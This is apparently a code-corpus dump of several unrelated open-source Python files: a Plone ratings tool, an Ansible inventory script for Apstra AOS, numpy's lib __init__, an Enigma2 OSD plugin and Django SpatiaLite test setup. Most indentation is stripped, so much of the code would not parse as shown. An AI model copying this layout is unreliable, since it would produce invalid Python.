results.sort(lambda x,y:cmp(y[0], x[0]))
return results[:limit]
security.declarePublic('getBadCountings')
def getBadCountings(self, brains, limit=5):
""" get top n cold contents from catalog brains """
results = []
for brain in brains:
count = self.getHitCount(brain.UID)
if count:
results.append((count, brain))
results.sort(lambda x,y:cmp(x[0], y[0]))
return results[:limit]
def addRating(self, rating, uid):
mt = getToolByName(self, 'portal_membership')
if mt.isAnonymousUser():
raise ValueError, 'Anonymous user cannot rate content'
# check permission
reference_catalog = getToolByName(self, 'reference_catalog')
object = reference_catalog.lookupObject(uid)
mt.checkPermission(ADD_RATING_PERMISSION, object)
member = mt.getAuthenticatedMember()
username = member.getUserName()
old_rating = self._getUserRating(uid, username)
if old_rating is not None:
self._deleteRating(uid, username)
return self._addRating(rating, uid, username)
def getUserRating(self, uid, username=None):
if username is None:
mt = getToolByName(self, 'portal_membership')
if mt.isAnonymousUser():
raise ValueError, 'Anonymous user cannot rate content'
member = mt.getAuthenticatedMember()
username = member.getUserName()
return self._getUserRating(uid, username)
def addHit(self, uid):
self._getStorage().addHit(uid)
# Summary statistics: HITS
# hits for individual item
def getHitCount(self, uid):
return self._getStorage().getHitCount(uid) or 0
# hits for all items
def getTotalHitCount(self):
return self._getHitsSummary().getCount()
def getHitRateTimeInterval(self):
return HIT_RATE_TIME_INTERVAL
def getHitRate(self, uid):
return self._getStorage().getHitRate(uid)
# Summary statistics: RATINGS
def getMinRating(self):
return MIN_RATING_VALUE
def getMaxRating(self):
return MAX_RATING_VALUE
# rating stats for individual items
def getRatingCount(self, uid):
return self._getStorage().getRatingCount(uid)
def getRatingSum(self, uid):
return self._getStorage().getSum(uid)
def getRatingSumSquared(self, uid):
return self._getStorage().getSumSquared(uid)
def getRatingMean(self, uid):
ratingMean = self._getStorage().getMean(uid)
if ratingMean == None:
return 0
else:
return ratingMean
def getRatingStdDev(self, uid):
return self._getStorage().getStdDev(uid)
def getRatingVariance(self, uid):
return self._getStorage().getVariance(uid)
# rating stats for all items
def getTotalRatingCount(self):
"""a count of rating means."""
return self._getStorage().getTotalRatingCount()
def getRatingMeanCount(self):
"""a count of rating means."""
return self._getStorage().getRatingMeanCount()
def getRatingMeanSum(self):
"""return a sum of rating means."""
return self._getStorage().getRatingMeanSum()
def getRatingMeanSumSquared(self):
"""a sum of rating means squared."""
return self._getStorage().getRatingMeanSumSquared()
def getRatingMeanMean(self):
"""a mean of rating means."""
return self._getStorage().getRatingMeanMean()
def getRatingMeanStdDev(self):
"""a standard deviation of rating means."""
return self._getStorage().getRatingMeanStdDev()
def getRatingMeanVariance(self):
"""a standard deviation of rating means"""
return self._getStorage().getRatingMeanVariance()
def getNoiseVariance(self):
return self._getStorage().getNoiseVariance()
def getEstimatedRating(self, uid):
"""Use a Bayesian MMSE estimator for DC in white Gaussian noise to
estimate the true rating for an item.
Motivation: a small number of very positive or very negative ratings
can make an item look much better or worse than it actually is. We
use a statistical technique to reduce this kind of small number bias.
Essentially we assume that true ratings have a Gaussian distribution.
Most true ratings are somewhere in the middle, with small numbers
very high and small numbers very low. User ratings for an item are
the item's true rating + some Gaussian noise. User ratings are
mostly close to the true rating, with a few much higher and a few
much lower.
We estimate a prior distribution of true means and the noise level
from all the data. We then use this prior info for the Bayesian
estimator. See _Fundamentals of Statistical Signal Processing_, by
        Steven Kay, pp. 316 - 321 for details.
"""
priorMean = self.getRatingMeanMean()
noiseVariance = self.getNoiseVariance()
itemMean = self.getRatingMean(uid)
if priorMean is None or noiseVariance is None:
# not enough information to compute a prior -- just return the mean
if itemMean is None:
# no data for computing a mean -- return the middle rating
return 0.5 * (float(self.getMinRating()) + float(self.getMaxRating()))
return itemMean
if itemMean is None:
return priorMean
priorVariance = self.getRatingMeanVariance()
if priorVariance == 0.0 and noiseVariance == 0.0:
return itemMean
itemRatings = self.getRatingCount(uid)
alpha = priorVariance / (priorVariance + noiseVariance/itemRatings)
return alpha * itemMean + (1.0 - alpha) * priorMean
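    # Sketch of the estimator above (a reading of the code, not authoritative):
    #   alpha = priorVariance / (priorVariance + noiseVariance / n)
    #   estimate = alpha * itemMean + (1 - alpha) * priorMean
    # With many ratings alpha approaches 1 and the item mean dominates; with
    # few ratings alpha shrinks and the estimate is pulled toward the prior mean.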
# private interface
def _getStorage(self):
if self.storage is None:
self.storage = STORAGE_CLASS(**STORAGE_ARGS)
return self.storage
def _addRating(self, rating, uid, username):
# delegate to storage
self._getStorage().addRating(rating, uid, username)
def _deleteRating(self, uid, username):
# delegate to storage
self._getStorage().deleteRating(uid, username)
def _getUserRating(self, uid, username):
# delegate to storage
return self._getStorage().getUserRating(uid, username)
def _deleteRatingsFor(self, uid):
# delegate to storage
return self._getStorage().deleteRatingsFor(uid)
def _getCyninRating(self,uid):
returnvalue = None
objRating = self._getStorage()._getObjectRatings(uid,0)
if objRating:
repository = objRating.repository
keyslist = [k for k in repository.keys() if k not in (HITS_SUMMARY_ID,RATINGS_SUMMARY_ID)]
if len(keyslist) == 0:
returnvalue = None
else:
returnvalue = 0
for eachkey in keyslist:
value = repository.get(eachkey,None)
if value and isinstance(value,int):
if value == NEUTRAL_RATING_VALUE:
self._deleteRating(uid,eachkey)
else:
returnvalue = returnvalue + (value - NEUTRAL_RATING_VALUE)
return returnvalue
def _getCyninRatingCount(self,uid):
result = {'positive':0,'negative':0,'positivescore':0,'negativescore':0}
objRating = self._getStorage()._getObjectRatings(uid,0)
if objRating:
repository = objRating.repository
keyslist = [k for k in repository.keys() if k not in (HITS_SUMMARY_ID,RATINGS_SUMMARY_ID)]
for eachkey in keyslist:
value = repository.get(eachkey,None)
if value and isinstance(value,int):
if value > NEUTRAL_RATING_VALUE:
result['positive'] = result['positive'] + 1
result['positivescore'] = result['positivescore'] + (value - NEUTRAL_RATING_VALUE)
elif value < NEUTRAL_RATING_VALUE:
result['negative'] = result['negative'] + 1
result['negativescore'] = result['negativescore'] + (value - NEUTRAL_RATING_VALUE)
return result
Globals.InitializeClass(RatingsTool)
| gpl-3.0 |
pchauncey/ansible | contrib/inventory/apstra_aos.py | 14 | 20398 | #!/usr/bin/env python
#
# (c) 2017 Apstra Inc, <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
"""
Apstra AOS external inventory script
====================================
Ansible has a feature where instead of reading from /etc/ansible/hosts
as a text file, it can query external programs to obtain the list
of hosts, groups the hosts are in, and even variables to assign to each host.
To use this:
- copy this file over /etc/ansible/hosts and chmod +x the file.
- Copy both files (.py and .ini) in your preferred directory
More information about Ansible Dynamic Inventory here
http://unix.stackexchange.com/questions/205479/in-ansible-dynamic-inventory-json-can-i-render-hostvars-based-on-the-hostname
Two modes are currently supported: **device based** or **blueprint based**:
- For **device based**, the list of devices is taken from the global device list;
  the serial ID will be used as the inventory_hostname
- For **blueprint based**, the list of devices is taken from the given blueprint;
  the node name will be used as the inventory_hostname
Input parameters can be provided either in the ini file or via environment variables:
The following environment variables are supported: AOS_SERVER, AOS_PORT, AOS_USERNAME, AOS_PASSWORD, AOS_BLUEPRINT
The config file takes precedence over the environment variables
Tested with Apstra AOS 1.1
This script has been inspired by the cobbler.py inventory. thanks
Author: Damien Garros (@dgarros)
Version: 0.2.0
"""
import json
import os
import re
import sys
try:
import argparse
HAS_ARGPARSE = True
except ImportError:
HAS_ARGPARSE = False
try:
from apstra.aosom.session import Session
HAS_AOS_PYEZ = True
except ImportError:
HAS_AOS_PYEZ = False
from ansible.module_utils.six.moves import configparser
"""
##
Expected output format in Device mode
{
"Cumulus": {
"hosts": [
"52540073956E",
"52540022211A"
],
"vars": {}
},
"EOS": {
"hosts": [
"5254001CAFD8",
"525400DDDF72"
],
"vars": {}
},
"Generic Model": {
"hosts": [
"525400E5486D"
],
"vars": {}
},
"Ubuntu GNU/Linux": {
"hosts": [
"525400E5486D"
],
"vars": {}
},
"VX": {
"hosts": [
"52540073956E",
"52540022211A"
],
"vars": {}
},
"_meta": {
"hostvars": {
"5254001CAFD8": {
"agent_start_time": "2017-02-03T00:49:16.000000Z",
"ansible_ssh_host": "172.20.52.6",
"aos_hcl_model": "Arista_vEOS",
"aos_server": "",
"aos_version": "AOS_1.1.1_OB.5",
"comm_state": "on",
"device_start_time": "2017-02-03T00:47:58.454480Z",
"domain_name": "",
"error_message": "",
"fqdn": "localhost",
"hostname": "localhost",
"hw_model": "vEOS",
"hw_version": "",
"is_acknowledged": false,
"mgmt_ifname": "Management1",
"mgmt_ipaddr": "172.20.52.6",
"mgmt_macaddr": "52:54:00:1C:AF:D8",
"os_arch": "x86_64",
"os_family": "EOS",
"os_version": "4.16.6M",
"os_version_info": {
"build": "6M",
"major": "4",
"minor": "16"
},
"serial_number": "5254001CAFD8",
"state": "OOS-QUARANTINED",
"vendor": "Arista"
},
"52540022211A": {
"agent_start_time": "2017-02-03T00:45:22.000000Z",
"ansible_ssh_host": "172.20.52.7",
"aos_hcl_model": "Cumulus_VX",
"aos_server": "172.20.52.3",
"aos_version": "AOS_1.1.1_OB.5",
"comm_state": "on",
"device_start_time": "2017-02-03T00:45:11.019189Z",
"domain_name": "",
"error_message": "",
"fqdn": "cumulus",
"hostname": "cumulus",
"hw_model": "VX",
"hw_version": "",
"is_acknowledged": false,
"mgmt_ifname": "eth0",
"mgmt_ipaddr": "172.20.52.7",
"mgmt_macaddr": "52:54:00:22:21:1a",
"os_arch": "x86_64",
"os_family": "Cumulus",
"os_version": "3.1.1",
"os_version_info": {
"build": "1",
"major": "3",
"minor": "1"
},
"serial_number": "52540022211A",
"state": "OOS-QUARANTINED",
"vendor": "Cumulus"
},
"52540073956E": {
"agent_start_time": "2017-02-03T00:45:19.000000Z",
"ansible_ssh_host": "172.20.52.8",
"aos_hcl_model": "Cumulus_VX",
"aos_server": "172.20.52.3",
"aos_version": "AOS_1.1.1_OB.5",
"comm_state": "on",
"device_start_time": "2017-02-03T00:45:11.030113Z",
"domain_name": "",
"error_message": "",
"fqdn": "cumulus",
"hostname": "cumulus",
"hw_model": "VX",
"hw_version": "",
"is_acknowledged": false,
"mgmt_ifname": "eth0",
"mgmt_ipaddr": "172.20.52.8",
"mgmt_macaddr": "52:54:00:73:95:6e",
"os_arch": "x86_64",
"os_family": "Cumulus",
"os_version": "3.1.1",
"os_version_info": {
"build": "1",
"major": "3",
"minor": "1"
},
"serial_number": "52540073956E",
"state": "OOS-QUARANTINED",
"vendor": "Cumulus"
},
"525400DDDF72": {
"agent_start_time": "2017-02-03T00:49:07.000000Z",
"ansible_ssh_host": "172.20.52.5",
"aos_hcl_model": "Arista_vEOS",
"aos_server": "",
"aos_version": "AOS_1.1.1_OB.5",
"comm_state": "on",
"device_start_time": "2017-02-03T00:47:46.929921Z",
"domain_name": "",
"error_message": "",
"fqdn": "localhost",
"hostname": "localhost",
"hw_model": "vEOS",
"hw_version": "",
"is_acknowledged": false,
"mgmt_ifname": "Management1",
"mgmt_ipaddr": "172.20.52.5",
"mgmt_macaddr": "52:54:00:DD:DF:72",
"os_arch": "x86_64",
"os_family": "EOS",
"os_version": "4.16.6M",
"os_version_info": {
"build": "6M",
"major": "4",
"minor": "16"
},
"serial_number": "525400DDDF72",
"state": "OOS-QUARANTINED",
"vendor": "Arista"
},
"525400E5486D": {
"agent_start_time": "2017-02-02T18:44:42.000000Z",
"ansible_ssh_host": "172.20.52.4",
"aos_hcl_model": "Generic_Server_1RU_1x10G",
"aos_server": "172.20.52.3",
"aos_version": "AOS_1.1.1_OB.5",
"comm_state": "on",
"device_start_time": "2017-02-02T21:11:25.188734Z",
"domain_name": "",
"error_message": "",
"fqdn": "localhost",
"hostname": "localhost",
"hw_model": "Generic Model",
"hw_version": "pc-i440fx-trusty",
"is_acknowledged": false,
"mgmt_ifname": "eth0",
"mgmt_ipaddr": "172.20.52.4",
"mgmt_macaddr": "52:54:00:e5:48:6d",
"os_arch": "x86_64",
"os_family": "Ubuntu GNU/Linux",
"os_version": "14.04 LTS",
"os_version_info": {
"build": "",
"major": "14",
"minor": "04"
},
"serial_number": "525400E5486D",
"state": "OOS-QUARANTINED",
"vendor": "Generic Manufacturer"
}
}
},
"all": {
"hosts": [
"5254001CAFD8",
"52540073956E",
"525400DDDF72",
"525400E5486D",
"52540022211A"
],
"vars": {}
},
"vEOS": {
"hosts": [
"5254001CAFD8",
"525400DDDF72"
],
"vars": {}
}
}
"""
def fail(msg):
sys.stderr.write("%s\n" % msg)
sys.exit(1)
class AosInventory(object):
def __init__(self):
""" Main execution path """
if not HAS_AOS_PYEZ:
raise Exception('aos-pyez is not installed. Please see details here: https://github.com/Apstra/aos-pyez')
if not HAS_ARGPARSE:
raise Exception('argparse is not installed. Please install the argparse library or upgrade to python-2.7')
# Initialize inventory
self.inventory = dict() # A list of groups and the hosts in that group
self.inventory['_meta'] = dict()
self.inventory['_meta']['hostvars'] = dict()
# Read settings and parse CLI arguments
self.read_settings()
self.parse_cli_args()
# ----------------------------------------------------
# Open session to AOS
# ----------------------------------------------------
aos = Session(server=self.aos_server,
port=self.aos_server_port,
user=self.aos_username,
passwd=self.aos_password)
aos.login()
# Save session information in variables of group all
self.add_var_to_group('all', 'aos_session', aos.session)
# Add the AOS server itself in the inventory
self.add_host_to_group("all", 'aos')
self.add_var_to_host("aos", "ansible_ssh_host", self.aos_server)
self.add_var_to_host("aos", "ansible_ssh_pass", self.aos_password)
self.add_var_to_host("aos", "ansible_ssh_user", self.aos_username)
# ----------------------------------------------------
# Build the inventory
        # Two modes are supported: device based or blueprint based
        # - For device based, the list of devices is taken from the global device list;
        #   the serial ID will be used as the inventory_hostname
        # - For blueprint based, the list of devices is taken from the given blueprint;
        #   the node name will be used as the inventory_hostname
# ----------------------------------------------------
if self.aos_blueprint:
bp = aos.Blueprints[self.aos_blueprint]
if bp.exists is False:
fail("Unable to find the Blueprint: %s" % self.aos_blueprint)
for dev_name, dev_id in bp.params['devices'].value.items():
self.add_host_to_group('all', dev_name)
device = aos.Devices.find(uid=dev_id)
if 'facts' in device.value.keys():
self.add_device_facts_to_var(dev_name, device)
# Define admin State and Status
if 'user_config' in device.value.keys():
if 'admin_state' in device.value['user_config'].keys():
self.add_var_to_host(dev_name, 'admin_state', device.value['user_config']['admin_state'])
self.add_device_status_to_var(dev_name, device)
# Go over the contents data structure
for node in bp.contents['system']['nodes']:
if node['display_name'] == dev_name:
self.add_host_to_group(node['role'], dev_name)
# Check for additional attribute to import
attributes_to_import = [
'loopback_ip',
'asn',
'role',
'position',
]
for attr in attributes_to_import:
if attr in node.keys():
self.add_var_to_host(dev_name, attr, node[attr])
# if blueprint_interface is enabled in the configuration
# Collect links information
if self.aos_blueprint_int:
interfaces = dict()
for link in bp.contents['system']['links']:
# each link has 2 sides [0,1], and it's unknown which one matches this device
# at first we assume the first side (0) matches and the peer is (1)
peer_id = 1
for side in link['endpoints']:
if side['display_name'] == dev_name:
# import local information first
int_name = side['interface']
# init dict
interfaces[int_name] = dict()
if 'ip' in side.keys():
interfaces[int_name]['ip'] = side['ip']
if 'interface' in side.keys():
interfaces[int_name]['name'] = side['interface']
if 'display_name' in link['endpoints'][peer_id].keys():
interfaces[int_name]['peer'] = link['endpoints'][peer_id]['display_name']
if 'ip' in link['endpoints'][peer_id].keys():
interfaces[int_name]['peer_ip'] = link['endpoints'][peer_id]['ip']
if 'type' in link['endpoints'][peer_id].keys():
interfaces[int_name]['peer_type'] = link['endpoints'][peer_id]['type']
else:
# if we didn't match the first time, prepare the peer_id
# for the second loop iteration
peer_id = 0
self.add_var_to_host(dev_name, 'interfaces', interfaces)
else:
for device in aos.Devices:
# If not reachable, create by key and
# if reachable, create by hostname
self.add_host_to_group('all', device.name)
# populate information for this host
self.add_device_status_to_var(device.name, device)
if 'user_config' in device.value.keys():
for key, value in device.value['user_config'].items():
self.add_var_to_host(device.name, key, value)
# Based on device status online|offline, collect facts as well
if device.value['status']['comm_state'] == 'on':
if 'facts' in device.value.keys():
self.add_device_facts_to_var(device.name, device)
# Check if device is associated with a blueprint
# if it is, create a new group
if 'blueprint_active' in device.value['status'].keys():
if 'blueprint_id' in device.value['status'].keys():
bp = aos.Blueprints.find(uid=device.value['status']['blueprint_id'])
if bp:
self.add_host_to_group(bp.name, device.name)
# ----------------------------------------------------
# Convert the inventory and return a JSON String
# ----------------------------------------------------
data_to_print = ""
data_to_print += self.json_format_dict(self.inventory, True)
print(data_to_print)
def read_settings(self):
""" Reads the settings from the apstra_aos.ini file """
config = configparser.ConfigParser()
config.read(os.path.dirname(os.path.realpath(__file__)) + '/apstra_aos.ini')
# Default Values
self.aos_blueprint = False
self.aos_blueprint_int = True
self.aos_username = 'admin'
self.aos_password = 'admin'
self.aos_server_port = 8888
# Try to read each parameter from the file; if not available, try the ENV
try:
self.aos_server = config.get('aos', 'aos_server')
except:
if 'AOS_SERVER' in os.environ.keys():
self.aos_server = os.environ['AOS_SERVER']
try:
self.aos_server_port = config.get('aos', 'port')
except:
if 'AOS_PORT' in os.environ.keys():
self.aos_server_port = os.environ['AOS_PORT']
try:
self.aos_username = config.get('aos', 'username')
except:
if 'AOS_USERNAME' in os.environ.keys():
self.aos_username = os.environ['AOS_USERNAME']
try:
self.aos_password = config.get('aos', 'password')
except:
if 'AOS_PASSWORD' in os.environ.keys():
self.aos_password = os.environ['AOS_PASSWORD']
try:
self.aos_blueprint = config.get('aos', 'blueprint')
except:
if 'AOS_BLUEPRINT' in os.environ.keys():
self.aos_blueprint = os.environ['AOS_BLUEPRINT']
try:
if config.get('aos', 'blueprint_interface') in ['false', 'no']:
self.aos_blueprint_int = False
except:
pass
def parse_cli_args(self):
""" Command line argument processing """
parser = argparse.ArgumentParser(description='Produce an Ansible Inventory file based on Apstra AOS')
parser.add_argument('--list', action='store_true', default=True, help='List instances (default: True)')
parser.add_argument('--host', action='store', help='Get all the variables about a specific instance')
self.args = parser.parse_args()
def json_format_dict(self, data, pretty=False):
""" Converts a dict to a JSON object and dumps it as a formatted string """
if pretty:
return json.dumps(data, sort_keys=True, indent=2)
else:
return json.dumps(data)
def add_host_to_group(self, group, host):
# Cleanup group name first
clean_group = self.cleanup_group_name(group)
# Check if the group exist, if not initialize it
if clean_group not in self.inventory.keys():
self.inventory[clean_group] = {}
self.inventory[clean_group]['hosts'] = []
self.inventory[clean_group]['vars'] = {}
self.inventory[clean_group]['hosts'].append(host)
def add_var_to_host(self, host, var, value):
# Check if the host exist, if not initialize it
if host not in self.inventory['_meta']['hostvars'].keys():
self.inventory['_meta']['hostvars'][host] = {}
self.inventory['_meta']['hostvars'][host][var] = value
def add_var_to_group(self, group, var, value):
# Cleanup group name first
clean_group = self.cleanup_group_name(group)
# Check if the group exist, if not initialize it
if clean_group not in self.inventory.keys():
self.inventory[clean_group] = {}
self.inventory[clean_group]['hosts'] = []
self.inventory[clean_group]['vars'] = {}
self.inventory[clean_group]['vars'][var] = value
def add_device_facts_to_var(self, device_name, device):
# Populate variables for this host
self.add_var_to_host(device_name,
'ansible_ssh_host',
device.value['facts']['mgmt_ipaddr'])
self.add_var_to_host(device_name, 'id', device.id)
# self.add_host_to_group('all', device.name)
for key, value in device.value['facts'].items():
self.add_var_to_host(device_name, key, value)
if key == 'os_family':
self.add_host_to_group(value, device_name)
elif key == 'hw_model':
self.add_host_to_group(value, device_name)
def cleanup_group_name(self, group_name):
"""
Clean up a group name by:
- Replacing all non-alphanumeric characters with underscores
- Converting to lowercase
"""
rx = re.compile(r'\W+')
clean_group = rx.sub('_', group_name).lower()
return clean_group
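# Illustrative examples (values are hypothetical, not from the source):
# cleanup_group_name('Spine 1') returns 'spine_1', and
# cleanup_group_name('vEOS') returns 'veos'.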
def add_device_status_to_var(self, device_name, device):
if 'status' in device.value.keys():
for key, value in device.value['status'].items():
self.add_var_to_host(device_name, key, value)
# Run the script
if __name__ == '__main__':
AosInventory()
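# Hedged usage sketch. The server address and credentials below are
# illustrative; the script reads them from apstra_aos.ini or from the
# environment variables handled in read_settings() above, and is then
# passed to ansible as a dynamic inventory:
#
# export AOS_SERVER=172.20.52.3
# export AOS_USERNAME=admin
# export AOS_PASSWORD=admin
# ./apstra_aos.py --list # dump the inventory as JSON
# ansible -i apstra_aos.py all -m ping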
| gpl-3.0 |
alephu5/Soundbyte | environment/lib/python3.3/site-packages/numpy/lib/__init__.py | 16 | 1122 | from __future__ import division, absolute_import, print_function
import math
from .info import __doc__
from numpy.version import version as __version__
from .type_check import *
from .index_tricks import *
from .function_base import *
from .nanfunctions import *
from .shape_base import *
from .stride_tricks import *
from .twodim_base import *
from .ufunclike import *
from . import scimath as emath
from .polynomial import *
#import convertcode
from .utils import *
from .arraysetops import *
from .npyio import *
from .financial import *
from .arrayterator import *
from .arraypad import *
__all__ = ['emath', 'math']
__all__ += type_check.__all__
__all__ += index_tricks.__all__
__all__ += function_base.__all__
__all__ += shape_base.__all__
__all__ += stride_tricks.__all__
__all__ += twodim_base.__all__
__all__ += ufunclike.__all__
__all__ += arraypad.__all__
__all__ += polynomial.__all__
__all__ += utils.__all__
__all__ += arraysetops.__all__
__all__ += npyio.__all__
__all__ += financial.__all__
__all__ += nanfunctions.__all__
from numpy.testing import Tester
test = Tester().test
bench = Tester().bench
| gpl-3.0 |
kingvuplus/EGAMI-E | lib/python/Plugins/SystemPlugins/OSDPositionSetup/plugin.py | 41 | 4968 | from Screens.Screen import Screen
from Components.ConfigList import ConfigListScreen
from Components.config import config, ConfigSubsection, ConfigInteger, ConfigSlider, getConfigListEntry
config.plugins.OSDPositionSetup = ConfigSubsection()
config.plugins.OSDPositionSetup.dst_left = ConfigInteger(default = 0)
config.plugins.OSDPositionSetup.dst_width = ConfigInteger(default = 720)
config.plugins.OSDPositionSetup.dst_top = ConfigInteger(default = 0)
config.plugins.OSDPositionSetup.dst_height = ConfigInteger(default = 576)
class OSDScreenPosition(Screen, ConfigListScreen):
skin = """
<screen position="0,0" size="e,e" title="OSD position setup" backgroundColor="blue">
<widget name="config" position="c-175,c-75" size="350,150" foregroundColor="black" backgroundColor="blue" />
<ePixmap pixmap="buttons/green.png" position="c-145,e-100" zPosition="0" size="140,40" alphatest="on" />
<ePixmap pixmap="buttons/red.png" position="c+5,e-100" zPosition="0" size="140,40" alphatest="on" />
<widget name="ok" position="c-145,e-100" size="140,40" valign="center" halign="center" zPosition="1" font="Regular;20" transparent="1" backgroundColor="green" />
<widget name="cancel" position="c+5,e-100" size="140,40" valign="center" halign="center" zPosition="1" font="Regular;20" transparent="1" backgroundColor="red" />
</screen>"""
def __init__(self, session):
self.skin = OSDScreenPosition.skin
Screen.__init__(self, session)
from Components.ActionMap import ActionMap
from Components.Button import Button
self["ok"] = Button(_("OK"))
self["cancel"] = Button(_("Cancel"))
self["actions"] = ActionMap(["SetupActions", "ColorActions", "MenuActions"],
{
"ok": self.keyGo,
"save": self.keyGo,
"cancel": self.keyCancel,
"green": self.keyGo,
"red": self.keyCancel,
"menu": self.closeRecursive,
}, -2)
self.list = []
ConfigListScreen.__init__(self, self.list, session = self.session)
left = config.plugins.OSDPositionSetup.dst_left.value
width = config.plugins.OSDPositionSetup.dst_width.value
top = config.plugins.OSDPositionSetup.dst_top.value
height = config.plugins.OSDPositionSetup.dst_height.value
self.dst_left = ConfigSlider(default = left, increment = 1, limits = (0, 720))
self.dst_width = ConfigSlider(default = width, increment = 1, limits = (0, 720))
self.dst_top = ConfigSlider(default = top, increment = 1, limits = (0, 576))
self.dst_height = ConfigSlider(default = height, increment = 1, limits = (0, 576))
self.list.append(getConfigListEntry(_("left"), self.dst_left))
self.list.append(getConfigListEntry(_("width"), self.dst_width))
self.list.append(getConfigListEntry(_("top"), self.dst_top))
self.list.append(getConfigListEntry(_("height"), self.dst_height))
self["config"].list = self.list
self["config"].l.setList(self.list)
def keyLeft(self):
ConfigListScreen.keyLeft(self)
self.setPreviewPosition()
def keyRight(self):
ConfigListScreen.keyRight(self)
self.setPreviewPosition()
def setPreviewPosition(self):
setPosition(int(self.dst_left.value), int(self.dst_width.value), int(self.dst_top.value), int(self.dst_height.value))
def keyGo(self):
config.plugins.OSDPositionSetup.dst_left.value = self.dst_left.value
config.plugins.OSDPositionSetup.dst_width.value = self.dst_width.value
config.plugins.OSDPositionSetup.dst_top.value = self.dst_top.value
config.plugins.OSDPositionSetup.dst_height.value = self.dst_height.value
config.plugins.OSDPositionSetup.save()
self.close()
def keyCancel(self):
setConfiguredPosition()
self.close()
def setPosition(dst_left, dst_width, dst_top, dst_height):
if dst_left + dst_width > 720:
dst_width = 720 - dst_left
if dst_top + dst_height > 576:
dst_height = 576 - dst_top
try:
# Write the four coordinates to the driver's proc interface as
# uppercase hex, one value per file.
for name, value in (("dst_left", dst_left), ("dst_width", dst_width),
("dst_top", dst_top), ("dst_height", dst_height)):
with open("/proc/stb/vmpeg/0/%s" % name, "w") as f:
f.write('%X' % value)
except IOError:
return
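# Worked example of the clamping above (values are illustrative):
# setPosition(40, 700, 0, 576) would overflow the 720-pixel width, so
# dst_width is clamped to 720 - 40 = 680 before the values are written
# to /proc/stb/vmpeg/0/* as uppercase hex (680 -> '2A8').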
def setConfiguredPosition():
setPosition(int(config.plugins.OSDPositionSetup.dst_left.value), int(config.plugins.OSDPositionSetup.dst_width.value), int(config.plugins.OSDPositionSetup.dst_top.value), int(config.plugins.OSDPositionSetup.dst_height.value))
def main(session, **kwargs):
session.open(OSDScreenPosition)
def startup(reason, **kwargs):
setConfiguredPosition()
def Plugins(**kwargs):
from os import path
if path.exists("/proc/stb/vmpeg/0/dst_left"):
from Plugins.Plugin import PluginDescriptor
return [PluginDescriptor(name = "OSD position setup", description = "Compensate for overscan", where = PluginDescriptor.WHERE_PLUGINMENU, fnc = main),
PluginDescriptor(name = "OSD position setup", description = "", where = PluginDescriptor.WHERE_SESSIONSTART, fnc = startup)]
return []
| gpl-2.0 |
onceuponatimeforever/oh-mainline | vendor/packages/Django/django/contrib/gis/db/backends/spatialite/creation.py | 100 | 5765 | import os
from django.conf import settings
from django.core.cache import get_cache
from django.core.cache.backends.db import BaseDatabaseCache
from django.core.exceptions import ImproperlyConfigured
from django.db.backends.sqlite3.creation import DatabaseCreation
class SpatiaLiteCreation(DatabaseCreation):
def create_test_db(self, verbosity=1, autoclobber=False):
"""
Creates a test database, prompting the user for confirmation if the
database already exists. Returns the name of the test database created.
This method is overloaded to load up the SpatiaLite initialization
SQL prior to calling the `syncdb` command.
"""
# Don't import django.core.management if it isn't needed.
from django.core.management import call_command
test_database_name = self._get_test_db_name()
if verbosity >= 1:
test_db_repr = ''
if verbosity >= 2:
test_db_repr = " ('%s')" % test_database_name
print("Creating test database for alias '%s'%s..." % (self.connection.alias, test_db_repr))
self._create_test_db(verbosity, autoclobber)
self.connection.close()
self.connection.settings_dict["NAME"] = test_database_name
self.connection.ops.confirm_spatial_components_versions()
# Need to load the SpatiaLite initialization SQL before running `syncdb`.
self.load_spatialite_sql()
# Report syncdb messages at one level lower than that requested.
# This ensures we don't get flooded with messages during testing
# (unless you really ask to be flooded)
call_command('syncdb',
verbosity=max(verbosity - 1, 0),
interactive=False,
database=self.connection.alias,
load_initial_data=False)
# We need to then do a flush to ensure that any data installed by
# custom SQL has been removed. The only test data should come from
# test fixtures, or autogenerated from post_syncdb triggers.
# This has the side effect of loading initial data (which was
# intentionally skipped in the syncdb).
call_command('flush',
verbosity=max(verbosity - 1, 0),
interactive=False,
database=self.connection.alias)
for cache_alias in settings.CACHES:
cache = get_cache(cache_alias)
if isinstance(cache, BaseDatabaseCache):
call_command('createcachetable', cache._table, database=self.connection.alias)
# Get a cursor (even though we don't need one yet). This has
# the side effect of initializing the test database.
cursor = self.connection.cursor()
return test_database_name
def sql_indexes_for_field(self, model, f, style):
"Return any spatial index creation SQL for the field."
from django.contrib.gis.db.models.fields import GeometryField
output = super(SpatiaLiteCreation, self).sql_indexes_for_field(model, f, style)
if isinstance(f, GeometryField):
gqn = self.connection.ops.geo_quote_name
qn = self.connection.ops.quote_name
db_table = model._meta.db_table
output.append(style.SQL_KEYWORD('SELECT ') +
style.SQL_TABLE('AddGeometryColumn') + '(' +
style.SQL_TABLE(gqn(db_table)) + ', ' +
style.SQL_FIELD(gqn(f.column)) + ', ' +
style.SQL_FIELD(str(f.srid)) + ', ' +
style.SQL_COLTYPE(gqn(f.geom_type)) + ', ' +
style.SQL_KEYWORD(str(f.dim)) + ', ' +
style.SQL_KEYWORD(str(int(not f.null))) +
');')
if f.spatial_index:
output.append(style.SQL_KEYWORD('SELECT ') +
style.SQL_TABLE('CreateSpatialIndex') + '(' +
style.SQL_TABLE(gqn(db_table)) + ', ' +
style.SQL_FIELD(gqn(f.column)) + ');')
return output
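# For a hypothetical model table "geo_city" with a 2D, non-null
# PointField named "point" (srid=4326, spatial_index=True), the SQL
# assembled above comes out as:
# SELECT AddGeometryColumn('geo_city', 'point', 4326, 'POINT', 2, 1);
# SELECT CreateSpatialIndex('geo_city', 'point');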
def load_spatialite_sql(self):
"""
This routine loads up the SpatiaLite SQL file.
"""
if self.connection.ops.spatial_version[:2] >= (2, 4):
# Spatialite >= 2.4 -- No need to load any SQL file, calling
# InitSpatialMetaData() transparently creates the spatial metadata
# tables
cur = self.connection._cursor()
cur.execute("SELECT InitSpatialMetaData()")
else:
# Spatialite < 2.4 -- Load the initial SQL
# Getting the location of the SpatiaLite SQL file, and confirming
# it exists.
spatialite_sql = self.spatialite_init_file()
